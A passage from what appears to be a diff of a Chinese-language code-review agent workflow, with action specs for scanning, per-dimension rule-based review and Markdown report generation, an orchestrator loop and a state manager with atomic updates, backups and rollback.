console.log('');
console.log(`📋 报告位置: ${state.report_path}`);
console.log('========================================');
// 5. 返回状态更新
return {
stateUpdates: {
status: 'completed',
completed_at: summary.completed_at,
summary: summary
}
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
status: 'completed',
completed_at: new Date().toISOString(),
summary: {
total_issues: state.summary.total_issues,
critical: state.summary.critical,
high: state.summary.high,
medium: state.summary.medium,
low: state.summary.low,
info: state.summary.info,
review_duration_ms: duration
}
}
};
```
## Output
- **Console**: 审查完成摘要
- **State**: 最终状态保存到 `state.json`
## Error Handling
| Error Type | Recovery |
|------------|----------|
| 状态保存失败 | 输出到控制台 |
## Next Actions
- 无(终止状态)
## Post-Completion
用户可以:
1. 查看完整报告: `cat ${workDir}/review-report.md`
2. 查看问题详情: `cat ${workDir}/findings/*.json`
3. 导出报告到其他位置

View File

@@ -0,0 +1,302 @@
# Action: Deep Review
深入审查指定维度的代码质量。
## Purpose
针对单个维度进行深入审查:
- 逐文件检查
- 记录发现的问题
- 提供具体的修复建议
## Preconditions
- [ ] state.status === 'running'
- [ ] state.scan_completed === true
- [ ] 存在未审查的维度
## Dimension Focus Areas
### Correctness (正确性)
- 逻辑错误和边界条件
- Null/undefined 处理
- 错误处理完整性
- 类型安全
- 资源泄漏
### Readability (可读性)
- 命名规范
- 函数长度和复杂度
- 代码重复
- 注释质量
- 代码组织
### Performance (性能)
- 算法复杂度
- 不必要的计算
- 内存使用
- I/O 效率
- 缓存策略
### Security (安全性)
- 注入风险 (SQL, XSS, Command)
- 认证和授权
- 敏感数据处理
- 加密使用
- 依赖安全
### Testing (测试)
- 测试覆盖率
- 边界条件测试
- 错误路径测试
- 测试可维护性
- Mock 使用
### Architecture (架构)
- 分层结构
- 依赖方向
- 单一职责
- 接口设计
- 扩展性
## Execution
```javascript
async function execute(state, workDir, currentDimension) {
const context = state.context;
const dimension = currentDimension;
const findings = [];
// 从外部 JSON 文件加载规则
const rulesConfig = loadRulesConfig(dimension, workDir);
const rules = rulesConfig.rules || [];
const prefix = rulesConfig.prefix || getDimensionPrefix(dimension);
// 优先审查高风险区域
const filesToReview = state.scan_summary?.risk_areas
?.map(r => r.file)
?.filter(f => context.files.includes(f)) || context.files;
const filesToCheck = [...new Set([
...filesToReview.slice(0, 20),
...context.files.slice(0, 30)
])].slice(0, 50); // 最多50个文件
let findingCounter = 1;
for (const file of filesToCheck) {
try {
const content = Read(file);
const lines = content.split('\n');
// 应用外部规则文件中的规则
for (const rule of rules) {
const matches = detectByPattern(content, lines, file, rule);
for (const match of matches) {
findings.push({
id: `${prefix}-${String(findingCounter++).padStart(3, '0')}`,
severity: rule.severity || match.severity,
dimension: dimension,
category: rule.category,
file: file,
line: match.line,
code_snippet: match.snippet,
description: rule.description,
recommendation: rule.recommendation,
fix_example: rule.fixExample
});
}
}
} catch (e) {
// 跳过无法读取的文件
}
}
// 保存维度发现
Write(`${workDir}/findings/${dimension}.json`, JSON.stringify(findings, null, 2));
return {
stateUpdates: {
reviewed_dimensions: [...(state.reviewed_dimensions || []), dimension],
current_dimension: null,
[`findings.${dimension}`]: findings
}
};
}
/**
* 从外部 JSON 文件加载规则配置
* 规则文件位于 specs/rules/{dimension}-rules.json
* @param {string} dimension - 维度名称 (correctness, security, etc.)
* @param {string} workDir - 工作目录 (用于日志记录)
* @returns {object} 规则配置对象,包含 rules 数组和 prefix
*/
function loadRulesConfig(dimension, workDir) {
// 规则文件路径:相对于 skill 目录
const rulesPath = `specs/rules/${dimension}-rules.json`;
try {
const rulesFile = Read(rulesPath);
const rulesConfig = JSON.parse(rulesFile);
return rulesConfig;
} catch (e) {
console.warn(`Failed to load rules for ${dimension}: ${e.message}`);
// 返回空规则配置,保持向后兼容
return { rules: [], prefix: getDimensionPrefix(dimension) };
}
}
/**
* 根据规则的 patternType 检测代码问题
* 支持的 patternType: regex, includes
* @param {string} content - 文件内容
* @param {string[]} lines - 按行分割的内容
* @param {string} file - 文件路径
* @param {object} rule - 规则配置对象
* @returns {Array} 匹配结果数组
*/
function detectByPattern(content, lines, file, rule) {
const matches = [];
const { pattern, patternType, negativePatterns, caseInsensitive } = rule;
if (!pattern) return matches;
switch (patternType) {
case 'regex':
return detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive);
case 'includes':
return detectByIncludes(content, lines, pattern, negativePatterns);
default:
// 默认使用 includes 模式
return detectByIncludes(content, lines, pattern, negativePatterns);
}
}
/**
* 使用正则表达式检测代码问题
* @param {string} content - 文件完整内容
* @param {string[]} lines - 按行分割的内容
* @param {string} pattern - 正则表达式模式
* @param {string[]} negativePatterns - 排除模式列表
* @param {boolean} caseInsensitive - 是否忽略大小写
* @returns {Array} 匹配结果数组
*/
function detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive) {
const matches = [];
const flags = caseInsensitive ? 'gi' : 'g';
try {
const regex = new RegExp(pattern, flags);
let match;
while ((match = regex.exec(content)) !== null) {
const lineNum = content.substring(0, match.index).split('\n').length;
const lineContent = lines[lineNum - 1] || '';
// 检查排除模式 - 如果行内容匹配任一排除模式则跳过
if (negativePatterns && negativePatterns.length > 0) {
const shouldExclude = negativePatterns.some(np => {
try {
return new RegExp(np).test(lineContent);
} catch {
return lineContent.includes(np);
}
});
if (shouldExclude) continue;
}
matches.push({
line: lineNum,
snippet: lineContent.trim().substring(0, 100),
matchedText: match[0]
});
}
} catch (e) {
console.warn(`Invalid regex pattern: ${pattern}`);
}
return matches;
}
/**
* 使用字符串包含检测代码问题
* @param {string} content - 文件完整内容 (未使用但保持接口一致)
* @param {string[]} lines - 按行分割的内容
* @param {string} pattern - 要查找的字符串
* @param {string[]} negativePatterns - 排除模式列表
* @returns {Array} 匹配结果数组
*/
function detectByIncludes(content, lines, pattern, negativePatterns) {
const matches = [];
lines.forEach((line, i) => {
if (line.includes(pattern)) {
// 检查排除模式 - 如果行内容包含任一排除字符串则跳过
if (negativePatterns && negativePatterns.length > 0) {
const shouldExclude = negativePatterns.some(np => line.includes(np));
if (shouldExclude) return;
}
matches.push({
line: i + 1,
snippet: line.trim().substring(0, 100),
matchedText: pattern
});
}
});
return matches;
}
/**
* 获取维度前缀(作为规则文件不存在时的备用)
* @param {string} dimension - 维度名称
* @returns {string} 4字符前缀
*/
function getDimensionPrefix(dimension) {
const prefixes = {
correctness: 'CORR',
readability: 'READ',
performance: 'PERF',
security: 'SEC',
testing: 'TEST',
architecture: 'ARCH'
};
return prefixes[dimension] || 'MISC';
}
```
## State Updates
```javascript
return {
stateUpdates: {
reviewed_dimensions: [...state.reviewed_dimensions, currentDimension],
current_dimension: null,
findings: {
...state.findings,
[currentDimension]: newFindings
}
}
};
```
## Output
- **File**: `findings/{dimension}.json`
- **Location**: `${workDir}/findings/`
- **Format**: JSON array of Finding objects
## Error Handling
| Error Type | Recovery |
|------------|----------|
| 文件读取失败 | 跳过该文件,记录警告 |
| 规则执行错误 | 跳过该规则,继续其他规则 |
## Next Actions
- 还有未审查维度: 继续 action-deep-review
- 所有维度完成: action-generate-report

View File

@@ -0,0 +1,263 @@
# Action: Generate Report
汇总所有发现,生成结构化审查报告。
## Purpose
生成最终的代码审查报告:
- 汇总所有维度的发现
- 按严重程度排序
- 提供统计摘要
- 输出 Markdown 格式报告
## Preconditions
- [ ] state.status === 'running'
- [ ] 所有维度已审查完成 (reviewed_dimensions.length === 6)
## Execution
```javascript
async function execute(state, workDir) {
const context = state.context;
const findings = state.findings;
// 1. 汇总所有发现
const allFindings = [
...findings.correctness,
...findings.readability,
...findings.performance,
...findings.security,
...findings.testing,
...findings.architecture
];
// 2. 按严重程度排序
const severityOrder = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };
allFindings.sort((a, b) => severityOrder[a.severity] - severityOrder[b.severity]);
// 3. 统计
const stats = {
total_issues: allFindings.length,
critical: allFindings.filter(f => f.severity === 'critical').length,
high: allFindings.filter(f => f.severity === 'high').length,
medium: allFindings.filter(f => f.severity === 'medium').length,
low: allFindings.filter(f => f.severity === 'low').length,
info: allFindings.filter(f => f.severity === 'info').length,
by_dimension: {
correctness: findings.correctness.length,
readability: findings.readability.length,
performance: findings.performance.length,
security: findings.security.length,
testing: findings.testing.length,
architecture: findings.architecture.length
}
};
// 4. 生成报告
const report = generateMarkdownReport(context, stats, allFindings, state.scan_summary);
// 5. 保存报告
const reportPath = `${workDir}/review-report.md`;
Write(reportPath, report);
return {
stateUpdates: {
report_generated: true,
report_path: reportPath,
summary: {
...stats,
review_duration_ms: Date.now() - new Date(state.started_at).getTime()
}
}
};
}
function generateMarkdownReport(context, stats, findings, scanSummary) {
const severityEmoji = {
critical: '🔴',
high: '🟠',
medium: '🟡',
low: '🔵',
info: '⚪'
};
let report = `# Code Review Report
## 审查概览
| 项目 | 值 |
|------|------|
| 目标路径 | \`${context.target_path}\` |
| 文件数量 | ${context.file_count} |
| 代码行数 | ${context.total_lines} |
| 主要语言 | ${context.language} |
| 框架 | ${context.framework || 'N/A'} |
## 问题统计
| 严重程度 | 数量 |
|----------|------|
| 🔴 Critical | ${stats.critical} |
| 🟠 High | ${stats.high} |
| 🟡 Medium | ${stats.medium} |
| 🔵 Low | ${stats.low} |
| ⚪ Info | ${stats.info} |
| **总计** | **${stats.total_issues}** |
### 按维度统计
| 维度 | 问题数 |
|------|--------|
| Correctness (正确性) | ${stats.by_dimension.correctness} |
| Security (安全性) | ${stats.by_dimension.security} |
| Performance (性能) | ${stats.by_dimension.performance} |
| Readability (可读性) | ${stats.by_dimension.readability} |
| Testing (测试) | ${stats.by_dimension.testing} |
| Architecture (架构) | ${stats.by_dimension.architecture} |
---
## 高风险区域
`;
if (scanSummary?.risk_areas?.length > 0) {
report += `| 文件 | 原因 | 优先级 |
|------|------|--------|
`;
for (const area of scanSummary.risk_areas.slice(0, 10)) {
report += `| \`${area.file}\` | ${area.reason} | ${area.priority} |\n`;
}
} else {
report += `未发现明显的高风险区域。\n`;
}
report += `
---
## 问题详情
`;
// 按维度分组输出
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
const dimensionNames = {
correctness: '正确性 (Correctness)',
security: '安全性 (Security)',
performance: '性能 (Performance)',
readability: '可读性 (Readability)',
testing: '测试 (Testing)',
architecture: '架构 (Architecture)'
};
for (const dim of dimensions) {
const dimFindings = findings.filter(f => f.dimension === dim);
if (dimFindings.length === 0) continue;
report += `### ${dimensionNames[dim]}
`;
for (const finding of dimFindings) {
report += `#### ${severityEmoji[finding.severity]} [${finding.id}] ${finding.category}
- **严重程度**: ${finding.severity.toUpperCase()}
- **文件**: \`${finding.file}\`${finding.line ? `:${finding.line}` : ''}
- **描述**: ${finding.description}
`;
if (finding.code_snippet) {
report += `
\`\`\`
${finding.code_snippet}
\`\`\`
`;
}
report += `
**建议**: ${finding.recommendation}
`;
if (finding.fix_example) {
report += `
**修复示例**:
\`\`\`
${finding.fix_example}
\`\`\`
`;
}
report += `
---
`;
}
}
report += `
## 审查建议
### 必须修复 (Must Fix)
${stats.critical + stats.high > 0
? `发现 ${stats.critical} 个严重问题和 ${stats.high} 个高优先级问题,建议在合并前修复。`
: '未发现必须立即修复的问题。'}
### 建议改进 (Should Fix)
${stats.medium > 0
? `发现 ${stats.medium} 个中等优先级问题,建议在后续迭代中改进。`
: '代码质量良好,无明显需要改进的地方。'}
### 可选优化 (Nice to Have)
${stats.low + stats.info > 0
? `发现 ${stats.low + stats.info} 个低优先级建议,可根据团队规范酌情处理。`
: '无额外建议。'}
---
*报告生成时间: ${new Date().toISOString()}*
`;
return report;
}
```
## State Updates
```javascript
return {
stateUpdates: {
report_generated: true,
report_path: reportPath,
summary: {
total_issues: totalCount,
critical: criticalCount,
high: highCount,
medium: mediumCount,
low: lowCount,
info: infoCount,
review_duration_ms: duration
}
}
};
```
## Output
- **File**: `review-report.md`
- **Location**: `${workDir}/review-report.md`
- **Format**: Markdown
## Error Handling
| Error Type | Recovery |
|------------|----------|
| 写入失败 | 尝试备用位置 |
| 模板错误 | 使用简化格式 |
## Next Actions
- 成功: action-complete

View File

@@ -0,0 +1,164 @@
# Action: Quick Scan
快速扫描代码,识别高风险区域。
## Purpose
进行第一遍快速扫描:
- 识别复杂度高的文件
- 标记潜在的高风险区域
- 发现明显的问题模式
## Preconditions
- [ ] state.status === 'running'
- [ ] state.context !== null
## Execution
```javascript
async function execute(state, workDir) {
const context = state.context;
const riskAreas = [];
const quickIssues = [];
// 1. 扫描每个文件
for (const file of context.files) {
try {
const content = Read(file);
const lines = content.split('\n');
// --- 复杂度检查 ---
const functionMatches = content.match(/function\s+\w+|=>\s*{|async\s+\w+/g) || [];
const nestingDepth = Math.max(...lines.map(l => (l.match(/^\s*/)?.[0].length || 0) / 2));
if (lines.length > 500 || functionMatches.length > 20 || nestingDepth > 8) {
riskAreas.push({
file: file,
reason: `High complexity: ${lines.length} lines, ${functionMatches.length} functions, depth ${nestingDepth}`,
priority: 'high'
});
}
// --- 快速问题检测 ---
// 安全问题快速检测
if (content.includes('eval(') || content.includes('innerHTML')) {
quickIssues.push({
type: 'security',
file: file,
message: 'Potential XSS/injection risk: eval() or innerHTML usage'
});
}
// 硬编码密钥检测
if (/(?:password|secret|api_key|token)\s*[=:]\s*['"][^'"]{8,}/i.test(content)) {
quickIssues.push({
type: 'security',
file: file,
message: 'Potential hardcoded credential detected'
});
}
// TODO/FIXME 检测
const todoCount = (content.match(/TODO|FIXME|HACK|XXX/gi) || []).length;
if (todoCount > 5) {
quickIssues.push({
type: 'maintenance',
file: file,
message: `${todoCount} TODO/FIXME comments found`
});
}
// console.log 检测(生产代码)
if (!file.includes('test') && !file.includes('spec')) {
const consoleCount = (content.match(/console\.(log|debug|info)/g) || []).length;
if (consoleCount > 3) {
quickIssues.push({
type: 'readability',
file: file,
message: `${consoleCount} console statements (should be removed in production)`
});
}
}
// 长函数检测
const longFunctions = content.match(/function[^{]+\{[^}]{2000,}\}/g) || [];
if (longFunctions.length > 0) {
quickIssues.push({
type: 'readability',
file: file,
message: `${longFunctions.length} long function(s) detected (>50 lines)`
});
}
// 错误处理检测
if (content.includes('catch') && content.includes('catch (') && content.match(/catch\s*\([^)]*\)\s*{\s*}/)) {
quickIssues.push({
type: 'correctness',
file: file,
message: 'Empty catch block detected'
});
}
} catch (e) {
// 跳过无法读取的文件
}
}
// 2. 计算复杂度评分
const complexityScore = Math.min(100, Math.round(
(riskAreas.length * 10 + quickIssues.length * 5) / context.file_count * 100
));
// 3. 构建扫描摘要
const scanSummary = {
risk_areas: riskAreas,
complexity_score: complexityScore,
quick_issues: quickIssues
};
// 4. 保存扫描结果
Write(`${workDir}/scan-summary.json`, JSON.stringify(scanSummary, null, 2));
return {
stateUpdates: {
scan_completed: true,
scan_summary: scanSummary
}
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
scan_completed: true,
scan_summary: {
risk_areas: riskAreas,
complexity_score: score,
quick_issues: quickIssues
}
}
};
```
## Output
- **File**: `scan-summary.json`
- **Location**: `${workDir}/scan-summary.json`
- **Format**: JSON
## Error Handling
| Error Type | Recovery |
|------------|----------|
| 文件读取失败 | 跳过该文件,继续扫描 |
| 编码问题 | 以二进制跳过 |
## Next Actions
- 成功: action-deep-review (开始逐维度审查)
- 风险区域过多 (>20): 可询问用户是否缩小范围

View File

@@ -0,0 +1,251 @@
# Orchestrator
根据当前状态选择并执行下一个审查动作。
## Role
Code Review 编排器,负责:
1. 读取当前审查状态
2. 根据状态选择下一个动作
3. 执行动作并更新状态
4. 循环直到审查完成
## Dependencies
- **State Manager**: [state-manager.md](./state-manager.md) - 提供原子化状态操作、自动备份、验证和回滚功能
## State Management
本模块使用 StateManager 进行所有状态操作,确保:
- **原子更新** - 写入临时文件后重命名,防止损坏
- **自动备份** - 每次更新前自动创建备份
- **回滚能力** - 失败时可从备份恢复
- **结构验证** - 确保状态结构完整性
### StateManager API (from state-manager.md)
```javascript
// 初始化状态
StateManager.initState(workDir)
// 读取当前状态
StateManager.getState(workDir)
// 更新状态(原子操作,自动备份)
StateManager.updateState(workDir, updates)
// 获取下一个待审查维度
StateManager.getNextDimension(state)
// 标记维度完成
StateManager.markDimensionComplete(workDir, dimension)
// 记录错误
StateManager.recordError(workDir, action, message)
// 从备份恢复
StateManager.restoreState(workDir)
```
## Decision Logic
```javascript
function selectNextAction(state) {
// 1. 终止条件检查
if (state.status === 'completed') return null;
if (state.status === 'user_exit') return null;
if (state.error_count >= 3) return 'action-abort';
// 2. 初始化阶段
if (state.status === 'pending' || !state.context) {
return 'action-collect-context';
}
// 3. 快速扫描阶段
if (!state.scan_completed) {
return 'action-quick-scan';
}
// 4. 深入审查阶段 - 使用 StateManager 获取下一个维度
const nextDimension = StateManager.getNextDimension(state);
if (nextDimension) {
return 'action-deep-review'; // 传递 dimension 参数
}
// 5. 报告生成阶段
if (!state.report_generated) {
return 'action-generate-report';
}
// 6. 完成
return 'action-complete';
}
```
## Execution Loop
```javascript
async function runOrchestrator() {
console.log('=== Code Review Orchestrator Started ===');
let iteration = 0;
const MAX_ITERATIONS = 20; // 6 dimensions + overhead
// 初始化状态(如果尚未初始化)
let state = StateManager.getState(workDir);
if (!state) {
state = StateManager.initState(workDir);
}
while (iteration < MAX_ITERATIONS) {
iteration++;
// 1. 读取当前状态(使用 StateManager
state = StateManager.getState(workDir);
if (!state) {
console.error('[Orchestrator] Failed to read state, attempting recovery...');
state = StateManager.restoreState(workDir);
if (!state) {
console.error('[Orchestrator] Recovery failed, aborting.');
break;
}
}
console.log(`[Iteration ${iteration}] Status: ${state.status}`);
// 2. 选择下一个动作
const actionId = selectNextAction(state);
if (!actionId) {
console.log('Review completed, terminating.');
break;
}
console.log(`[Iteration ${iteration}] Executing: ${actionId}`);
// 3. 更新状态:当前动作(使用 StateManager
StateManager.updateState(workDir, { current_action: actionId });
// 4. 执行动作
try {
const actionPrompt = Read(`phases/actions/${actionId}.md`);
// 确定当前需要审查的维度(使用 StateManager
const currentDimension = StateManager.getNextDimension(state);
const result = await Task({
subagent_type: 'universal-executor',
run_in_background: false,
prompt: `
[WORK_DIR]
${workDir}
[STATE]
${JSON.stringify(state, null, 2)}
[CURRENT_DIMENSION]
${currentDimension || 'N/A'}
[ACTION]
${actionPrompt}
[SPECS]
Review Dimensions: specs/review-dimensions.md
Issue Classification: specs/issue-classification.md
[RETURN]
Return JSON with stateUpdates field containing updates to apply to state.
`
});
const actionResult = JSON.parse(result);
// 5. 更新状态:动作完成(使用 StateManager
StateManager.updateState(workDir, {
current_action: null,
completed_actions: [...(state.completed_actions || []), actionId],
...actionResult.stateUpdates
});
// 如果是深入审查动作,标记维度完成
if (actionId === 'action-deep-review' && currentDimension) {
StateManager.markDimensionComplete(workDir, currentDimension);
}
} catch (error) {
// 错误处理(使用 StateManager.recordError
console.error(`[Orchestrator] Action failed: ${error.message}`);
StateManager.recordError(workDir, actionId, error.message);
// 清除当前动作
StateManager.updateState(workDir, { current_action: null });
// 检查是否需要恢复状态
const updatedState = StateManager.getState(workDir);
if (updatedState && updatedState.error_count >= 3) {
console.error('[Orchestrator] Too many errors, attempting state recovery...');
StateManager.restoreState(workDir);
}
}
}
console.log('=== Code Review Orchestrator Finished ===');
}
```
## Action Catalog
| Action | Purpose | Preconditions |
|--------|---------|---------------|
| [action-collect-context](actions/action-collect-context.md) | 收集审查目标上下文 | status === 'pending' |
| [action-quick-scan](actions/action-quick-scan.md) | 快速扫描识别风险区域 | context !== null |
| [action-deep-review](actions/action-deep-review.md) | 深入审查指定维度 | scan_completed === true |
| [action-generate-report](actions/action-generate-report.md) | 生成结构化审查报告 | all dimensions reviewed |
| [action-complete](actions/action-complete.md) | 完成审查,保存结果 | report_generated === true |
## Termination Conditions
- `state.status === 'completed'` - 审查正常完成
- `state.status === 'user_exit'` - 用户主动退出
- `state.error_count >= 3` - 错误次数超限(由 StateManager.recordError 自动处理)
- `iteration >= MAX_ITERATIONS` - 迭代次数超限
## Error Recovery
本模块利用 StateManager 提供的错误恢复机制:
| Error Type | Recovery Strategy | StateManager Function |
|------------|-------------------|----------------------|
| 状态读取失败 | 从备份恢复 | `restoreState(workDir)` |
| 动作执行失败 | 记录错误,累计超限后自动失败 | `recordError(workDir, action, message)` |
| 状态不一致 | 验证并恢复 | `getState()` 内置验证 |
| 用户中止 | 保存当前进度 | `updateState(workDir, { status: 'user_exit' })` |
### 错误处理流程
```
1. 动作执行失败
|
2. StateManager.recordError() 记录错误
|
3. 检查 error_count
|
+-- < 3: 继续下一次迭代
+-- >= 3: StateManager 自动设置 status='failed'
|
Orchestrator 检测到 status 变化
|
尝试 restoreState() 恢复到上一个稳定状态
```
### 状态备份时机
StateManager 在以下时机自动创建备份:
- 每次 `updateState()` 调用前
- 可通过 `backupState(workDir, suffix)` 手动创建命名备份
### 历史追踪
所有状态变更记录在 `state-history.json`,便于调试和审计:
- 初始化事件
- 每次更新的字段变更
- 恢复操作记录

View File

@@ -0,0 +1,752 @@
# State Manager
Centralized state management module for Code Review workflow. Provides atomic operations, automatic backups, validation, and rollback capabilities.
## Overview
This module solves the fragile state management problem by providing:
- **Atomic updates** - Write to temp file, then rename (prevents corruption)
- **Automatic backups** - Every update creates a backup first
- **Rollback capability** - Restore from backup on failure
- **Schema validation** - Ensure state structure integrity
- **Change history** - Track all state modifications
## File Structure
```
{workDir}/
state.json # Current state
state.backup.json # Latest backup
state-history.json # Change history log
```
## API Reference
### initState(workDir)
Initialize a new state file with default values.
```javascript
/**
* Initialize state file with default structure
* @param {string} workDir - Working directory path
* @returns {object} - Initial state object
*/
function initState(workDir) {
const now = new Date().toISOString();
const initialState = {
status: 'pending',
started_at: now,
updated_at: now,
context: null,
scan_completed: false,
scan_summary: null,
reviewed_dimensions: [],
current_dimension: null,
findings: {
correctness: [],
readability: [],
performance: [],
security: [],
testing: [],
architecture: []
},
report_generated: false,
report_path: null,
current_action: null,
completed_actions: [],
errors: [],
error_count: 0,
summary: null
};
// Write state file
const statePath = `${workDir}/state.json`;
Write(statePath, JSON.stringify(initialState, null, 2));
// Initialize history log
const historyPath = `${workDir}/state-history.json`;
const historyEntry = {
entries: [{
timestamp: now,
action: 'init',
changes: { type: 'initialize', status: 'pending' }
}]
};
Write(historyPath, JSON.stringify(historyEntry, null, 2));
console.log(`[StateManager] Initialized state at ${statePath}`);
return initialState;
}
```
### getState(workDir)
Read and parse current state from file.
```javascript
/**
* Read current state from file
* @param {string} workDir - Working directory path
* @returns {object|null} - Current state or null if not found
*/
function getState(workDir) {
const statePath = `${workDir}/state.json`;
try {
const content = Read(statePath);
const state = JSON.parse(content);
// Validate structure before returning
const validation = validateState(state);
if (!validation.valid) {
console.warn(`[StateManager] State validation warnings: ${validation.warnings.join(', ')}`);
}
return state;
} catch (error) {
console.error(`[StateManager] Failed to read state: ${error.message}`);
return null;
}
}
```
### updateState(workDir, updates)
Safely update state with atomic write and automatic backup.
```javascript
/**
* Safely update state with atomic write
* @param {string} workDir - Working directory path
* @param {object} updates - Partial state updates to apply
* @returns {object} - Updated state object
* @throws {Error} - If update fails (automatically rolls back)
*/
function updateState(workDir, updates) {
const statePath = `${workDir}/state.json`;
const tempPath = `${workDir}/state.tmp.json`;
const backupPath = `${workDir}/state.backup.json`;
const historyPath = `${workDir}/state-history.json`;
// Step 1: Read current state
let currentState;
try {
currentState = JSON.parse(Read(statePath));
} catch (error) {
throw new Error(`Cannot read current state: ${error.message}`);
}
// Step 2: Create backup before any modification
try {
Write(backupPath, JSON.stringify(currentState, null, 2));
} catch (error) {
throw new Error(`Cannot create backup: ${error.message}`);
}
// Step 3: Merge updates
const now = new Date().toISOString();
const newState = deepMerge(currentState, {
...updates,
updated_at: now
});
// Step 4: Validate new state
const validation = validateState(newState);
if (!validation.valid && validation.errors.length > 0) {
throw new Error(`Invalid state after update: ${validation.errors.join(', ')}`);
}
// Step 5: Write to temp file first (atomic preparation)
try {
Write(tempPath, JSON.stringify(newState, null, 2));
} catch (error) {
throw new Error(`Cannot write temp state: ${error.message}`);
}
// Step 6: Atomic rename (replace original with temp)
try {
// Read temp and write to original (simulating atomic rename)
const tempContent = Read(tempPath);
Write(statePath, tempContent);
// Clean up temp file
Bash(`rm -f "${tempPath}"`);
} catch (error) {
// Rollback: restore from backup
console.error(`[StateManager] Update failed, rolling back: ${error.message}`);
try {
const backup = Read(backupPath);
Write(statePath, backup);
} catch (rollbackError) {
throw new Error(`Critical: Update failed and rollback failed: ${rollbackError.message}`);
}
throw new Error(`Update failed, rolled back: ${error.message}`);
}
// Step 7: Record in history
try {
let history = { entries: [] };
try {
history = JSON.parse(Read(historyPath));
} catch (e) {
// History file may not exist, start fresh
}
history.entries.push({
timestamp: now,
action: 'update',
changes: summarizeChanges(currentState, newState, updates)
});
// Keep only last 100 entries
if (history.entries.length > 100) {
history.entries = history.entries.slice(-100);
}
Write(historyPath, JSON.stringify(history, null, 2));
} catch (error) {
// History logging failure is non-critical
console.warn(`[StateManager] Failed to log history: ${error.message}`);
}
console.log(`[StateManager] State updated successfully`);
return newState;
}
/**
* Deep merge helper - merges nested objects
*/
function deepMerge(target, source) {
const result = { ...target };
for (const key of Object.keys(source)) {
if (source[key] === null || source[key] === undefined) {
result[key] = source[key];
} else if (Array.isArray(source[key])) {
result[key] = source[key];
} else if (typeof source[key] === 'object' && typeof target[key] === 'object') {
result[key] = deepMerge(target[key], source[key]);
} else {
result[key] = source[key];
}
}
return result;
}
/**
* Summarize changes for history logging
*/
function summarizeChanges(oldState, newState, updates) {
const changes = {};
for (const key of Object.keys(updates)) {
if (key === 'updated_at') continue;
const oldVal = oldState[key];
const newVal = newState[key];
if (JSON.stringify(oldVal) !== JSON.stringify(newVal)) {
changes[key] = {
from: typeof oldVal === 'object' ? '[object]' : oldVal,
to: typeof newVal === 'object' ? '[object]' : newVal
};
}
}
return changes;
}
```
### validateState(state)
Validate state structure against schema.
```javascript
/**
* Validate state structure
* @param {object} state - State object to validate
* @returns {object} - { valid: boolean, errors: string[], warnings: string[] }
*/
function validateState(state) {
const errors = [];
const warnings = [];
// Required fields
const requiredFields = ['status', 'started_at', 'updated_at'];
for (const field of requiredFields) {
if (state[field] === undefined) {
errors.push(`Missing required field: ${field}`);
}
}
// Status validation
const validStatuses = ['pending', 'running', 'completed', 'failed', 'user_exit'];
if (state.status && !validStatuses.includes(state.status)) {
errors.push(`Invalid status: ${state.status}. Must be one of: ${validStatuses.join(', ')}`);
}
// Timestamp format validation
const timestampFields = ['started_at', 'updated_at', 'completed_at'];
for (const field of timestampFields) {
if (state[field] && !isValidISOTimestamp(state[field])) {
warnings.push(`Invalid timestamp format for ${field}`);
}
}
// Findings structure validation
if (state.findings) {
const expectedDimensions = ['correctness', 'readability', 'performance', 'security', 'testing', 'architecture'];
for (const dim of expectedDimensions) {
if (!Array.isArray(state.findings[dim])) {
warnings.push(`findings.${dim} should be an array`);
}
}
}
// Context validation (when present)
if (state.context !== null && state.context !== undefined) {
const contextFields = ['target_path', 'files', 'language', 'total_lines', 'file_count'];
for (const field of contextFields) {
if (state.context[field] === undefined) {
warnings.push(`context.${field} is missing`);
}
}
}
// Error count validation
if (typeof state.error_count !== 'number') {
warnings.push('error_count should be a number');
}
// Array fields validation
const arrayFields = ['reviewed_dimensions', 'completed_actions', 'errors'];
for (const field of arrayFields) {
if (state[field] !== undefined && !Array.isArray(state[field])) {
errors.push(`${field} must be an array`);
}
}
return {
valid: errors.length === 0,
errors,
warnings
};
}
/**
* Check if string is valid ISO timestamp
*/
function isValidISOTimestamp(str) {
if (typeof str !== 'string') return false;
const date = new Date(str);
return !isNaN(date.getTime()) && str.includes('T');
}
```
### backupState(workDir)
Create a manual backup of current state.
```javascript
/**
* Create a manual backup of current state
* @param {string} workDir - Working directory path
* @param {string} [suffix] - Optional suffix for backup file name
* @returns {string} - Backup file path
*/
function backupState(workDir, suffix = null) {
const statePath = `${workDir}/state.json`;
const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
const backupName = suffix
? `state.backup.${suffix}.json`
: `state.backup.${timestamp}.json`;
const backupPath = `${workDir}/${backupName}`;
try {
const content = Read(statePath);
Write(backupPath, content);
console.log(`[StateManager] Backup created: ${backupPath}`);
return backupPath;
} catch (error) {
throw new Error(`Failed to create backup: ${error.message}`);
}
}
```
### restoreState(workDir, backupPath)
Restore state from a backup file.
```javascript
/**
* Restore state from a backup file
* @param {string} workDir - Working directory path
* @param {string} [backupPath] - Path to backup file (default: latest backup)
* @returns {object} - Restored state object
*/
function restoreState(workDir, backupPath = null) {
const statePath = `${workDir}/state.json`;
const defaultBackup = `${workDir}/state.backup.json`;
const historyPath = `${workDir}/state-history.json`;
const sourcePath = backupPath || defaultBackup;
try {
// Read backup
const backupContent = Read(sourcePath);
const backupState = JSON.parse(backupContent);
// Validate backup state
const validation = validateState(backupState);
if (!validation.valid) {
throw new Error(`Backup state is invalid: ${validation.errors.join(', ')}`);
}
// Create backup of current state before restore (for safety)
try {
const currentContent = Read(statePath);
Write(`${workDir}/state.pre-restore.json`, currentContent);
} catch (e) {
// Current state may not exist, that's okay
}
// Update timestamp
const now = new Date().toISOString();
backupState.updated_at = now;
// Write restored state
Write(statePath, JSON.stringify(backupState, null, 2));
// Log to history
try {
let history = { entries: [] };
try {
history = JSON.parse(Read(historyPath));
} catch (e) {}
history.entries.push({
timestamp: now,
action: 'restore',
changes: { source: sourcePath }
});
Write(historyPath, JSON.stringify(history, null, 2));
} catch (e) {
console.warn(`[StateManager] Failed to log restore to history`);
}
console.log(`[StateManager] State restored from ${sourcePath}`);
return backupState;
} catch (error) {
throw new Error(`Failed to restore state: ${error.message}`);
}
}
```
## Convenience Functions
### getNextDimension(state)
Get the next dimension to review based on current state.
```javascript
/**
* Get next dimension to review
* @param {object} state - Current state
